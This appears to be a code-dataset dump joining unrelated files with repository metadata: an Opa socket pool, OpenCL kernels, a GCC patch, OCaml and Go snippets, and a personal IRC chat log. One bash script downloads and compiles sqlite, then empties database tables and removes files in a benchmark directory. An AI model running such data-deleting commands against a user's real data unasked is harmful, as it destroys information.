THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
import stdlib.core.queue
/**
* Authentication information.
* We should really parametrise the socket pool with this
* type but that would propagate for miles and miles.
* For now we just provide two general-purpose ints and a bool
* (see Postgres for the use of the ints).
*/
type SocketPool.auth = { authenticated:bool; i1:int; i2:int }
/**
* A SocketPool.result is either a socket or a string which describes the socket error.
*/
type SocketPool.result = outcome(Socket.t, string)
/**
* A SocketPool result with an authorisation flag.
*/
type SocketPool.auth_result = outcome((Socket.t,SocketPool.auth), string)
/**
* Some protocols have a preamble to trigger SSL authentication (see Postgres).
*/
type SocketPool.preamble = Socket.t -> SocketPool.result
/**
* Configuration of socket pool.
*/
type SocketPool.conf = {
/** Indicates if the pool should output a trace of its action */
verbose : bool;
/** The default hint of the allocated mailboxes */
hint : int;
/** The maximum number of allocated socket */
max : int;
}
@private type SocketPool.waiter =
{waiter:continuation(SocketPool.result)}
/ {auth_waiter:continuation(SocketPool.auth_result)}
@private type SocketPool.state = {
host : Socket.host;
secure_type : option(SSL.secure_type);
preamble : option(SocketPool.preamble);
conf : SocketPool.conf;
sockets: list(Socket.t);
auths: list(SocketPool.auth);
allocated: list(Socket.t);
cnt: int;
queue: Queue.t(SocketPool.waiter);
open_connections: intset;
}
@private type SocketPool.msg =
{get : continuation(SocketPool.result)}
/ {get_auth : continuation(SocketPool.auth_result)}
/ {release : Socket.t}
/ {release_auth : (Socket.t,SocketPool.auth)}
/ {reconnect : Socket.host}
/ {getconf : continuation(SocketPool.conf)}
/ {updconf : SocketPool.conf -> SocketPool.conf}
/ {gethost : continuation(Socket.host)}
/ {close}
/ {stop}
@abstract type SocketPool.t = channel(SocketPool.msg)
@server_private
SocketPool = {{
@private
Log = {{
@private
@expand
gen(f, m, fn:string, msg) =
if m.conf.verbose then f("SocketPool({m.host}).{fn}", msg)
else void
@expand
info(m, fn, msg) = gen(@toplevel.Log.info, m, fn, msg)
@expand
debug(m, fn, msg) = gen(@toplevel.Log.debug, m, fn, msg)
@expand
error(m, fn, msg) = gen(@toplevel.Log.error, m, fn, msg)
}}
@private
socket_close(conn, state) =
conn_id = Socket.conn_id(conn.conn)
do Log.debug(state, "SocketPool.handler", "close {conn_id}")
do Socket.close(conn.conn)
_ = Mailbox.reset(conn.mbox)
{state with open_connections=IntSet.remove(conn_id,state.open_connections)}
@private @expand monitor(__from, __state) =
#<Ifstatic:SOCKET_POOL_DEBUG>
do Log.debug(__state, "handler({__from})",
"open={List.list_to_string(Int.to_string,IntSet.To.list(__state.open_connections))}")
do Log.debug(__state, "handler({__from})",
"sockets={List.list_to_string(Int.to_string,List.map((id -> Socket.conn_id(id.conn)),__state.sockets))}")
do Log.debug(__state, "handler({__from})",
"allocated={List.list_to_string(Int.to_string,List.map((id -> Socket.conn_id(id.conn)),__state.allocated))}")
void
#<Else>
void
#<End>
@private release_socket(state:SocketPool.state, connection:Socket.t, authenticated:SocketPool.auth): Session.instruction(SocketPool.state) =
do monitor("release", state)
conn_id = Socket.conn_id(connection.conn)
if List.exists((c -> Socket.conn_id(c.conn) == conn_id),state.allocated)
then
match Queue.rem(state.queue) with
| ({none}, _) ->
do Log.debug(state, "handler","socket back in pool {Socket.conn_id(connection.conn)}")
sockets = connection +> state.sockets
auths = authenticated +> state.auths
conn_id = Socket.conn_id(connection.conn)
allocated = List.filter((s -> Socket.conn_id(s.conn) != conn_id),state.allocated)
{set={state with ~sockets; ~auths; ~allocated}}
| ({some={~waiter}}, queue) ->
do Log.debug(state, "handler","reallocate socket {Socket.conn_id(connection.conn)}")
do Continuation.return(waiter, {success=connection})
{set={state with ~queue}}
| ({some={~auth_waiter}}, queue) ->
do Log.debug(state, "handler","reallocate socket {Socket.conn_id(connection.conn)}")
do Continuation.return(auth_waiter, {success=(connection,authenticated)})
{set={state with ~queue}}
end
else
do Log.debug(state, "handler","drop socket {Socket.conn_id(connection.conn)}")
state = socket_close(connection, state)
{set=state}
@private socket_return(k:SocketPool.waiter, connection, authenticated:SocketPool.auth) : void =
match k with
| {waiter=k} -> Continuation.return(k, {success=connection})
| {auth_waiter=k} -> Continuation.return(k, {success=(connection,authenticated)})
end
@private socket_error(k:SocketPool.waiter, failure:{failure:string}) : void =
match (k,failure) with
| ({waiter=k},{~failure}) -> Continuation.return(k, ~{failure})
| ({auth_waiter=k},{~failure}) -> Continuation.return(k, ~{failure})
end
@private get_socket(state:SocketPool.state, k:SocketPool.waiter): Session.instruction(SocketPool.state) =
do monitor("get", state)
match (state.sockets,state.auths) with
| ([connection|sockets],[authenticated|auths]) ->
do Log.debug(state, "handler","reuse open socket {Socket.conn_id(connection.conn)}")
do socket_return(k, connection, authenticated)
allocated = connection +> state.allocated
{set={state with ~sockets; ~auths; ~allocated}}
| (_,_) ->
if state.cnt >= state.conf.max
then
do Log.debug(state, "handler", "queue caller")
{set={state with queue=Queue.add(k, state.queue)}}
else
match
match state.secure_type with
| {some=secure_type} ->
match state.preamble with
| {some=preamble} ->
//match Socket.binary_secure_connect_with_err_cont(state.host.f1,state.host.f2,false,secure_type) with
match Socket.binary_connect_with_err_cont(state.host.f1,state.host.f2) with
| {success=conn} ->
match preamble({~conn; mbox=Mailbox.create(state.conf.hint)}) with
| {success=conn} ->
Socket.binary_secure_reconnect_with_err_cont(conn.conn,state.host.f1,state.host.f2,secure_type)
| ~{failure} -> ~{failure}
end
| ~{failure} -> ~{failure}
end
| {none} -> Socket.binary_secure_connect_with_err_cont(state.host.f1,state.host.f2,true,secure_type)
end
| {none} -> Socket.binary_connect_with_err_cont(state.host.f1,state.host.f2)
end
with
| {success=conn} ->
connection = {~conn; mbox=Mailbox.create(state.conf.hint)}
state = {state with open_connections=IntSet.add(Socket.conn_id(connection.conn),state.open_connections)}
do Log.debug(state, "handler", "successfully opened socket {Socket.conn_id(connection.conn)}")
do socket_return(k, connection, {authenticated=false; i1=-1; i2=-1})
allocated = connection +> state.allocated
{set={state with cnt=state.cnt+1; ~allocated}}
| {failure=str} ->
do Log.debug(state, "handler", "open socket failure: {str}")
do socket_error(k, {failure=str})
{unchanged}
end
@private pool_handler(state:SocketPool.state, msg:SocketPool.msg): Session.instruction(SocketPool.state) =
match msg with
| {release=connection} -> release_socket(state, connection, {authenticated=false; i1=-1; i2=-1})
| {release_auth=(connection,authenticated)} -> release_socket(state, connection, authenticated)
| {get=k} -> get_socket(state, {waiter=k})
| {get_auth=k} -> get_socket(state, {auth_waiter=k})
| {reconnect=host} ->
do monitor("reconnect", state)
do Log.debug(state, "handler", "reconnect({host.f1}.{host.f2})")
state = List.fold(socket_close,state.sockets,state)
state = List.fold(socket_close,state.allocated,state)
{set={state with ~host; cnt=0; sockets=[]; auths=[]; allocated=[]}}
| {getconf=k} ->
do Continuation.return(k, state.conf)
{unchanged}
| {updconf=f} ->
{set = {state with conf = f(state.conf)}}
| {gethost=k} ->
do Continuation.return(k, state.host)
{unchanged}
| {close} ->
do Log.debug(state, "handler","close socket pool")
state = List.fold(socket_close,state.sockets,state)
state = List.fold(socket_close,state.allocated,state)
{set={state with auths=[]}}
| {stop} ->
do monitor("stop", state)
do Log.debug(state, "handler","stop socket pool")
state = List.fold(socket_close,state.sockets,state)
_state = List.fold(socket_close,state.allocated,state)
{stop}
@private
initial_state(host, conf, secure_type, preamble) = {
~host; ~conf; ~secure_type; ~preamble;
cnt=0;
sockets=[];
auths=[];
allocated=[];
queue=Queue.empty;
open_connections=IntSet.empty;
}
/**
* Create a pool of sockets which will return sockets connected to the [host].
* @param host The host to connect
* @param conf The initial configuration of the socket pool
* @return A pool of sockets
*/
make(host:Socket.host, conf:SocketPool.conf): SocketPool.t =
state = initial_state(host, conf, none, none)
do Log.debug(state, "make","{host}")
Session.make(state, pool_handler)
/**
* Create a pool of sockets which will return sockets securely connected to the [host].
* @param host The host to connect
* @param conf The initial configuration of the socket pool
* @param secure_type The optional SSL security information, none is the same as an insecure connection
* @param preamble An optional function to call upon an insecure socket before SSL handshake
* @return A pool of sockets
*/
make_secure(host:Socket.host, conf:SocketPool.conf,
secure_type:option(SSL.secure_type), preamble:option(SocketPool.preamble)): SocketPool.t =
state = initial_state(host, conf, secure_type, preamble)
do Log.debug(state, "make","{host}")
Session.make(state, pool_handler)
/**
* Get a socket from the [pool]. If the maximum of allocated sockets are
* reached wait until a socket is released (see [SocketPool.conf]).
* @param pool The pool of socket
* @return A socket connected to the current [host] of the pool
*/
get(pool:SocketPool.t) : SocketPool.result =
@callcc(k -> Session.send(pool, {get=k}))
/**
* Same as get but also returns an authentication value associated with the socket.
* This is intended, for example, to attach an "authenticated" status to the socket
* for connections requiring external authentication.
*/
get_auth(pool:SocketPool.t) : SocketPool.auth_result =
@callcc(k -> Session.send(pool, {get_auth=k}))
/**
* Same as get but the result is returned to the [callback]
* @param pool The pool of socket
* @param callback The callback which receives the result
*/
get_async(pool:SocketPool.t, callback) =
@callcc(k ->
do Continuation.return(k, void)
callback(get(pool))
)
/**
* Same as get_async but with the authentication flag.
*/
get_auth_async(pool:SocketPool.t, callback) =
@callcc(k ->
do Continuation.return(k, void)
callback(get_auth(pool))
)
/**
* Release [socket] into the pool. If the socket not coming from the [pool]
* then the socket is just close and the pool stay unchanged.
* @param socket The socket to release
* @param pool The pool of socket
*/
release(pool:SocketPool.t, socket:Socket.t) : void =
Session.send(pool, {release=socket})
/**
* Same as release but returns the authentication flag along with the socket.
*/
release_auth(pool:SocketPool.t, socket:Socket.t, authenticated:SocketPool.auth) : void =
Session.send(pool, {release_auth=(socket,authenticated)})
/**
* Change the [host] where sockets of the pool are connected.
* @param pool The pool of socket
* @param host The new host to set
*/
reconnect(pool:SocketPool.t, host:Socket.host) : void =
Session.send(pool, {reconnect=host})
/**
* Close all allocated socket into the socket [pool]
* @param pool The pool of socket
*/
close(pool:SocketPool.t) : void =
Session.send(pool, {close})
/**
* Stop the pool of socket, no more socket will be allocated.
* @param pool The pool of socket
*/
stop(pool:SocketPool.t) : void =
Session.send(pool, {stop})
@private getconf_map(pool, f) = f(getconf(pool))
/**
* Returns the configuration of the [pool] of socket
* @param pool The pool of socket
* @return The configuration of the [pool]
*/
getconf(pool:SocketPool.t) : SocketPool.conf =
@callcc(k -> Session.send(pool, {getconf=k}))
/**
* Returns the host of the [pool] of socket
* @param pool The pool of socket
* @return The host of the [pool]
*/
gethost(pool:SocketPool.t) : Socket.host =
@callcc(k -> Session.send(pool, {gethost=k}))
/**
* Returns the maximum number of allocated socket of the [pool] of socket
* @param pool The pool of socket
* @return The maximum number of allocated socket of the [pool]
*/
getmax(pool:SocketPool.t) : int =
getconf_map(pool, _.max)
/**
* Returns the default hint of allocated mailboxes of the [pool] of socket
* @param pool The pool of socket
* @return The default hint of allocated mailboxes of the [pool]
*/
gethint(pool:SocketPool.t) : int =
getconf_map(pool, _.hint)
/**
* Returns the verbosity of the [pool] of socket
* @param pool The pool of socket
* @return The verbosity of the [pool]
*/
getverbose(pool:SocketPool.t) : bool =
getconf_map(pool, _.verbose)
@private setconf_map(pool, f) =
Session.send(pool, {updconf=f})
/**
* Set the configuration of the [pool] of socket
* @param pool The pool of socket
* @param The new configuration of the [pool]
*/
setconf(pool:SocketPool.t, conf:SocketPool.conf) =
setconf_map(pool, (_ -> conf))
/**
* Set the maximum number of allocated socket of the [pool] of socket
* @param pool The pool of socket
* @param max The new maximum number of allocated socket of the [pool]
*/
setmax(pool:SocketPool.t, max) =
setconf_map(pool, (conf -> {conf with ~max}))
/**
* Set the default hint of allocated mailboxes of the [pool] of socket
* @param pool The pool of socket
* @param hint The new default hint of allocated mailboxes of the [pool]
*/
sethint(pool:SocketPool.t, hint:int) =
setconf_map(pool, (conf -> {conf with ~hint}))
/**
* Set the verbosity of the [pool] of socket
* @param pool The pool of socket
* @param verbose
*/
setverbose(pool:SocketPool.t, verbose) =
setconf_map(pool, (conf -> {conf with ~verbose}))
}}
// End of file socketpool.opa
| Opa | 5 | Machiaweliczny/oppailang | lib/stdlib/io/socket/socket_pool.opa | [
"MIT"
] |
#!/bin/bash
set -e
CWD="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
NYLAS_DIR="$HOME/.nylas-bench"
TRUNCATE_TABLES="
Account
AccountPluginMetadata
Calendar
Category
Contact
ContactSearch
Event
EventSearch
File
Message
MessageBody
MessagePluginMetadata
ProviderSyncbackRequest
Thread
ThreadCategory
ThreadContact
ThreadCounts
ThreadPluginMetadata
ThreadSearch"
SQLITE_DIR=$CWD/sqlite
SQLITE_BIN=$SQLITE_DIR/sqlite3
SQLITE_SRC_DIR="$SQLITE_DIR/sqlite-amalgamation-3170000"
# Build the sqlite3 amalgamation if necessary because we need FTS5 support.
if [[ ! -e "$SQLITE_BIN" ]]
then
mkdir -p $SQLITE_DIR
curl -s "https://www.sqlite.org/2017/sqlite-amalgamation-3170000.zip" > "$SQLITE_DIR/sqlite-amalgamation.zip"
unzip -o -d $SQLITE_DIR "$SQLITE_DIR/sqlite-amalgamation.zip"
clang -DSQLITE_DISABLE_INTRINSIC -DSQLITE_ENABLE_FTS5 "$SQLITE_SRC_DIR/sqlite3.c" "$SQLITE_SRC_DIR/shell.c" -o $SQLITE_BIN
fi
rm -f $NYLAS_DIR/a-*.sqlite
EDGEHILL_DB=$NYLAS_DIR/edgehill.db
for TABLE in $TRUNCATE_TABLES
do
COMMAND="DELETE FROM $TABLE"
$SQLITE_BIN $EDGEHILL_DB "DELETE FROM $TABLE"
done
$SQLITE_BIN $EDGEHILL_DB 'DELETE FROM JSONBlob WHERE client_id != "NylasID"'
| Shell | 3 | cnheider/nylas-mail | scripts/drop-data-except-accounts.sh | [
"MIT"
] |
#include "Python.h"
#ifdef HAVE_GCC_ASM_FOR_X87
// Inline assembly for getting and setting the 387 FPU control word on
// GCC/x86.
#ifdef _Py_MEMORY_SANITIZER
__attribute__((no_sanitize_memory))
#endif
unsigned short _Py_get_387controlword(void) {
unsigned short cw;
__asm__ __volatile__ ("fnstcw %0" : "=m" (cw));
return cw;
}
void _Py_set_387controlword(unsigned short cw) {
__asm__ __volatile__ ("fldcw %0" : : "m" (cw));
}
#endif // HAVE_GCC_ASM_FOR_X87
| C | 4 | oleksandr-pavlyk/cpython | Python/pymath.c | [
"0BSD"
] |
// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
// Copyright (C) 2014, Advanced Micro Devices, Inc., all rights reserved.
// Third party copyrights are property of their respective owners.
__kernel void NCC(__global const uchar *patch,
__global const uchar *positiveSamples,
__global const uchar *negativeSamples,
__global float *ncc,
int posNum,
int negNum)
{
int id = get_global_id(0);
if (id >= 1000) return;
bool posFlg;
if (id < 500)
posFlg = true;
if (id >= 500)
{
//Negative index
id = id - 500;
posFlg = false;
}
//Variables
int s1 = 0, s2 = 0, n1 = 0, n2 = 0, prod = 0;
float sq1 = 0, sq2 = 0, ares = 0;
int N = 225;
//NCC with positive sample
if (posFlg && id < posNum)
{
for (int i = 0; i < N; i++)
{
s1 += positiveSamples[id * N + i];
s2 += patch[i];
n1 += positiveSamples[id * N + i] * positiveSamples[id * N + i];
n2 += patch[i] * patch[i];
prod += positiveSamples[id * N + i] * patch[i];
}
sq1 = sqrt(max(0.0, n1 - 1.0 * s1 * s1 / N));
sq2 = sqrt(max(0.0, n2 - 1.0 * s2 * s2 / N));
ares = (sq2 == 0) ? sq1 / fabs(sq1) : (prod - s1 * s2 / N) / sq1 / sq2;
ncc[id] = ares;
}
//NCC with negative sample
if (!posFlg && id < negNum)
{
for (int i = 0; i < N; i++)
{
s1 += negativeSamples[id * N + i];
s2 += patch[i];
n1 += negativeSamples[id * N + i] * negativeSamples[id * N + i];
n2 += patch[i] * patch[i];
prod += negativeSamples[id * N + i] * patch[i];
}
sq1 = sqrt(max(0.0, n1 - 1.0 * s1 * s1 / N));
sq2 = sqrt(max(0.0, n2 - 1.0 * s2 * s2 / N));
ares = (sq2 == 0) ? sq1 / fabs(sq1) : (prod - s1 * s2 / N) / sq1 / sq2;
ncc[id+500] = ares;
}
}
__kernel void batchNCC(__global const uchar *patches,
__global const uchar *positiveSamples,
__global const uchar *negativeSamples,
__global float *posNcc,
__global float *negNcc,
int posNum,
int negNum,
int patchNum)
{
int id = get_global_id(0);
bool posFlg;
if (id < 500*patchNum)
posFlg = true;
if (id >= 500*patchNum)
{
//Negative index
id = id - 500*patchNum;
posFlg = false;
}
int modelSampleID = id % 500;
int patchID = id / 500;
//Variables
int s1 = 0, s2 = 0, n1 = 0, n2 = 0, prod = 0;
float sq1 = 0, sq2 = 0, ares = 0;
int N = 225;
//NCC with positive sample
if (posFlg && modelSampleID < posNum)
{
for (int i = 0; i < N; i++)
{
s1 += positiveSamples[modelSampleID * N + i];
s2 += patches[patchID*N + i];
n1 += positiveSamples[modelSampleID * N + i] * positiveSamples[modelSampleID * N + i];
n2 += patches[patchID*N + i] * patches[patchID*N + i];
prod += positiveSamples[modelSampleID * N + i] * patches[patchID*N + i];
}
sq1 = sqrt(max(0.0, n1 - 1.0 * s1 * s1 / N));
sq2 = sqrt(max(0.0, n2 - 1.0 * s2 * s2 / N));
ares = (sq2 == 0) ? sq1 / fabs(sq1) : (prod - s1 * s2 / N) / sq1 / sq2;
posNcc[id] = ares;
}
//NCC with negative sample
if (!posFlg && modelSampleID < negNum)
{
for (int i = 0; i < N; i++)
{
s1 += negativeSamples[modelSampleID * N + i];
s2 += patches[patchID*N + i];
n1 += negativeSamples[modelSampleID * N + i] * negativeSamples[modelSampleID * N + i];
n2 += patches[patchID*N + i] * patches[patchID*N + i];
prod += negativeSamples[modelSampleID * N + i] * patches[patchID*N + i];
}
sq1 = sqrt(max(0.0, n1 - 1.0 * s1 * s1 / N));
sq2 = sqrt(max(0.0, n2 - 1.0 * s2 * s2 / N));
ares = (sq2 == 0) ? sq1 / fabs(sq1) : (prod - s1 * s2 / N) / sq1 / sq2;
negNcc[id] = ares;
}
}
| OpenCL | 4 | Nondzu/opencv_contrib | modules/tracking/src/opencl/tldDetector.cl | [
"BSD-3-Clause"
] |
def f(a&: int) -> void begin
a = 1
end
def main() -> void begin
a: int = 0
f(a)
# test
print(a) # should print '1'
end
| Cycript | 2 | matheuspb/cython | examples/reference.cy | [
"MIT"
] |
#! /bin/sh -e
# multiarch-lib.dpatch by Stephen Frost <sfrost@debian.org>
dir=
if [ $# -eq 3 -a "$2" = '-d' ]; then
pdir="-d $3"
dir="$3/"
elif [ $# -ne 1 ]; then
echo >&2 "`basename $0`: script expects -patch|-unpatch as argument"
exit 1
fi
case "$1" in
-patch)
patch $pdir -f --no-backup-if-mismatch -p0 < $0
;;
-unpatch)
patch $pdir -f --no-backup-if-mismatch -R -p0 < $0
;;
*)
echo >&2 "`basename $0`: script expects -patch|-unpatch as argument"
exit 1
esac
exit 0
diff -urN gcc.old/config/i386/t-linux64 gcc/config/i386/t-linux64
--- gcc.old/config/i386/t-linux64 2002-11-28 15:47:02.000000000 +0100
+++ gcc/config/i386/t-linux64 2004-07-10 07:28:01.000000000 +0200
@@ -6,7 +6,7 @@
MULTILIB_OPTIONS = m64/m32
MULTILIB_DIRNAMES = 64 32
-MULTILIB_OSDIRNAMES = ../lib64 ../lib
+MULTILIB_OSDIRNAMES = x86_64-linux i486-linux
LIBGCC = stmp-multilib
INSTALL_LIBGCC = install-multilib
diff -urN gcc.old/config/t-linux gcc/config/t-linux
--- gcc.old/config/t-linux 2004-05-04 18:09:38.000000000 +0200
+++ gcc/config/t-linux 2004-07-10 07:28:01.000000000 +0200
@@ -11,3 +11,11 @@
LIB2ADDEH = $(srcdir)/unwind-dw2.c $(srcdir)/unwind-dw2-fde-glibc.c \
$(srcdir)/unwind-sjlj.c $(srcdir)/gthr-gnat.c $(srcdir)/unwind-c.c
LIB2ADDEHDEP = unwind.inc unwind-dw2-fde.h unwind-dw2-fde.c
+
+MULTILIB_OPTIONS = m32
+MULTILIB_DIRNAMES = 32
+MULTILIB_OSDIRNAMES = $TARGET_ARCH
+
+LIBGCC = stmp-multilib
+INSTALL_LIBGCC = install-multilib
+
| Darcs Patch | 3 | JrCs/opendreambox | recipes/gcc/gcc-4.3.4/debian/multiarch-lib.dpatch | [
"MIT"
] |
// Copyright 2017 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Issue 18452: show pos info in undefined name errors
package p
import (
"C"
"fmt"
)
func a() {
fmt.Println("Hello, world!")
C.function_that_does_not_exist() // ERROR HERE
C.pi // ERROR HERE
}
| Go | 3 | Havoc-OS/androidprebuilts_go_linux-x86 | misc/cgo/errors/src/issue18452.go | [
"BSD-3-Clause"
] |
(*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*)
type flow_mode =
| OptIn
| OptInStrict
| OptInStrictLocal
| OptOut
(*
* Specifies a function that should be invoked instead of React.createElement
* when interpreting JSX syntax. Otherwise, the usual rules of JSX are
* followed: children are varargs after a props argument.
*)
type jsx_pragma = string * (Loc.t, Loc.t) Flow_ast.Expression.t
type t = {
flow: flow_mode option;
typeAssert: bool;
preventMunge: bool;
providesModule: string option;
jsx: jsx_pragma option;
}
let default_info =
{ flow = None; typeAssert = false; preventMunge = false; providesModule = None; jsx = None }
(* accessors *)
let flow info = info.flow
let typeAssert info = info.typeAssert
let preventMunge info = info.preventMunge
let providesModule info = info.providesModule
let jsx info = info.jsx
let is_strict info =
match info.flow with
| Some OptInStrict -> true
| Some OptIn
| Some OptInStrictLocal
| Some OptOut
| None ->
false
let is_flow info =
match info.flow with
| Some OptIn
| Some OptInStrict
| Some OptInStrictLocal ->
true
| Some OptOut
| None ->
false
(* debugging *)
let json_of_docblock info =
Hh_json.(
let flow =
match flow info with
| Some OptIn -> JSON_String "OptIn"
| Some OptInStrict -> JSON_String "OptInStrict"
| Some OptInStrictLocal -> JSON_String "OptInStrictLocal"
| Some OptOut -> JSON_String "OptOut"
| None -> JSON_Null
in
let preventsMunge =
if preventMunge info then
JSON_Bool true
else
JSON_Null
in
let providesModule =
match providesModule info with
| Some str -> JSON_String str
| None -> JSON_Null
in
let typeAssert = JSON_Bool (typeAssert info) in
JSON_Object
[
("flow", flow);
("typeAssert", typeAssert);
("preventMunge", preventsMunge);
("providesModule", providesModule);
]
)
| OCaml | 5 | zhangmaijun/flow | src/common/docblock.ml | [
"MIT"
] |
:- initialization((
logtalk_load(a(loader)),
logtalk_load(b)
)).
| Logtalk | 2 | PaulBrownMagic/logtalk3 | examples/looping/b/loader.lgt | [
"Apache-2.0"
] |
2016-03-02 09:18:39 fsociety now you are in a special window just for you
2016-03-02 09:18:55 fsociety still getting used to this telegram function in irc.. it works a little differently as you can imagine
2016-03-02 09:19:12 Michael interesting
2016-03-02 09:19:19 fsociety plans for the day?
2016-03-02 09:19:23 Michael ahh many years spent on mIRC
2016-03-02 09:19:52 fsociety its IRC, you are talking about the client itself :)
2016-03-02 09:20:07 Michael umm not sure exactly. I was thinking the car needs a wash because its dirty really abdly and I can't remember the last time i washed it :/
2016-03-02 09:20:43 fsociety sometimes i wish i could have a day like that
2016-03-02 09:20:44 Michael our car spot out the front is in between two trees and a roof gutter with a power line coming out from the roof to the street power line
2016-03-02 09:20:48 Michael so bird shit galore
2016-03-02 09:20:51 Michael :S
2016-03-02 09:21:09 fsociety maybe not have a day like that though.. haha
2016-03-02 09:21:22 Michael oh mang 2015 was like that for me... I really don't have any plans to make this permanent
2016-03-02 09:21:28 Michael I need to work asap
2016-03-02 09:21:44 Michael so i'm looking for anything... heck even couriering :)
2016-03-02 09:21:57 fsociety yeah dude it industry is fucked
2016-03-02 09:22:11 Michael you know
2016-03-02 09:22:37 Michael I have been giving completing a traineeship for Telecommunications serious thought
2016-03-02 09:22:49 Michael I actually did prior to starting at this TSA company till I got the job
2016-03-02 09:22:50 fsociety that's crap
2016-03-02 09:23:30 Michael as Telstra had many Traineeships beginning 2016... but unfortunately as it's early March they've already begun and I would need to start mid year
2016-03-02 09:23:58 Michael It's completing a Trainesship in Cert III Telecomunications or Cert IV Telecomunication (Network Design)
2016-03-02 09:24:07 Michael and going back asa mature age trainee
2016-03-02 09:24:13 Michael you get about $700 a week
2016-03-02 09:24:52 Michael and complete it in 24 months... upon which the company you completed the traineeship usually have limited positions available
2016-03-02 09:25:13 Michael I thought work while I learn sure why not... and then get into the industry and bobs your uncle
2016-03-02 09:25:30 Michael and I know what your thinking... Cert III or Cert IV wtf?
2016-03-02 09:25:41 Michael it seems a little... underwhemling you could say heh
2016-03-02 09:26:00 Michael But I guess it's because it's more hands on kinda like a trade - being out in the field
2016-03-02 09:26:29 Michael so advanced theory / classrom excercises isn't really required as more on the job experience
2016-03-02 09:26:35 fsociety start your own windows development for small businesses :)
2016-03-02 09:27:15 Michael I'm not that advanced in the windows environment heh
2016-03-02 09:27:34 Michael I had my first tastes of Server 2012 and Exchange 2012 etc at this new company
2016-03-02 09:27:52 Michael even Windows 8 Enterprise actually hehe
2016-03-02 09:28:01 Michael I'm lagging so far behind in knowledge
2016-03-02 09:28:21 Michael (i'm quite capable of learning fast)
2016-03-02 09:29:22 Michael but i'm just sayin'... this new gen of folks graduating frmo using t he latest and best in "Microsoft" orientated products... I would be trailing behind a little perhaps... :S... maybe
2016-03-02 09:31:54 fsociety pfft.. ppl "graduating".. anybody that studies a microsoft certificate or even a linux course will never have a long standing job
2016-03-02 09:31:54 - [Michael] is away: Mobile
2016-03-02 09:32:04 fsociety they don't know how to problem solve, need to be spoon fed
2016-03-02 09:32:29 fsociety amusing how a lot of high profile companies look for what essentially are "whitehat hackers".. people who learnt through trial and error
2016-03-02 09:35:49 Michael lol
2016-03-02 09:35:51 Michael true
2016-03-02 09:36:46 fsociety so im grabbing my spare black drive off my friend tonight and then putting the rma for that black drive in tomorrow
2016-03-02 09:36:50 fsociety it has a 5-yr warranty :)
2016-03-02 09:37:41 Michael but you know the manager's from the last couple companies I worked at (and yes the dush companies - i.e. Toll TCS and TSA) lol I know when they were searching for new candidates the thing that 'mesmerized' management was certifications. Especially if you had this and that and this and that.... lol basically every letter of the alphabet type list of certfications...
2016-03-02 09:37:50 Michael it'd be the main thing that would of wowed them
2016-03-02 09:38:10 Michael Experience came second I guess lol
2016-03-02 09:38:37 Michael ...and I guess it just shows the company's quality :P
2016-03-02 09:38:46 Michael i.e. shit!
2016-03-02 09:39:39 fsociety haha yeah... so many it specialists i have met that are damn hopeless
2016-03-02 09:44:41 Michael 👍
2016-03-02 09:46:13 fsociety which reminds me i'll msg my friend today about the ps4 if you like
2016-03-02 09:47:22 Michael sweeeet
2016-03-02 09:47:29 Michael that would gewwwwd
2016-03-02 09:47:32 fsociety is this your 3rd ps4
2016-03-02 09:47:34 Michael 👍
2016-03-02 09:47:57 Michael yes I believe it would be lol
2016-03-02 09:48:08 Michael third? wow? really?
2016-03-02 09:48:45 fsociety hahahaha...
2016-03-02 09:48:47 Michael jeez im churning through them faster then slimeline PS3s
2016-03-02 09:48:48 fsociety *face palm*
2016-03-02 09:49:04 Michael I think I had 4 of them hehe
2016-03-02 09:49:21 Michael the blu ray died twice on 2 separate ones
2016-03-02 09:49:38 Michael well once it died
2016-03-02 09:50:17 fsociety really - wow
2016-03-02 09:50:20 Michael another one it wasn't reading it right like the disk would be hitting a side when it spun around so it's like the chasis was wrong
2016-03-02 09:50:54 Michael and when it was loading it would do large clinks every now and then and would lock the game up constantly
2016-03-02 09:50:56 Michael lol
2016-03-02 09:51:06 Michael yeah I had many troubles with the PS3
2016-03-02 09:51:57 Michael one of them my housemate at the time was playing one of the CoD games all day long every day whilst I was at work
2016-03-02 09:52:05 Michael and I would come home and play it also
2016-03-02 09:52:58 Michael apparently I heard that with the slim line PS3s or something they don't have sufficient fans or something like that and so evry like hour or two of gaming you need to stop and let it cool for 15 minutes else it would burn out
2016-03-02 09:53:08 fsociety i've never had an issue with my slim line
2016-03-02 09:53:10 fsociety its 6 years old
2016-03-02 09:53:39 fsociety sounds like you are talking about the old xbox 360s haha
2016-03-02 09:53:42 Michael hmmm potato potAhtoe
2016-03-02 09:53:46 Michael :P
2016-03-02 09:54:05 Michael hehe just like the poor sods buying an xbox and getting the ring of death
2016-03-02 09:54:25 Michael hmmm not red ring of death
2016-03-02 09:54:30 Michael there was a name for it though
2016-03-02 09:54:47 Michael affected alot of Xboxs but not all
2016-03-02 09:56:30 fsociety hahaha.. consoles are meh these days.. every aspect i liked about a console has been thrown out the window
2016-03-02 09:56:43 fsociety consoles now require patches, firmware updates, os upgrades, hard drive installations
2016-03-02 09:56:53 fsociety removes every aspect on what made a console appealing
2016-03-02 10:59:11 Michael lol wellz... as they say Its no longer a 'game console' instead now they're 'home entertainment systems'
2016-03-02 10:59:13 Michael hehe :P
2016-03-02 10:59:29 fsociety oh your back :)
2016-03-02 10:59:36 Michael :P
2016-03-02 10:59:44 Michael I'm never too far away
2016-03-02 11:01:20 Michael I'm going to call Legal Aid - specifically Vic Uni Legal (guessing law students) hehe - but yeah before writing back to the HR representative from TSA I want to make sure that what I'll reply with is plausible and if i should bother pursuing the case
2016-03-02 11:01:28 Michael You know
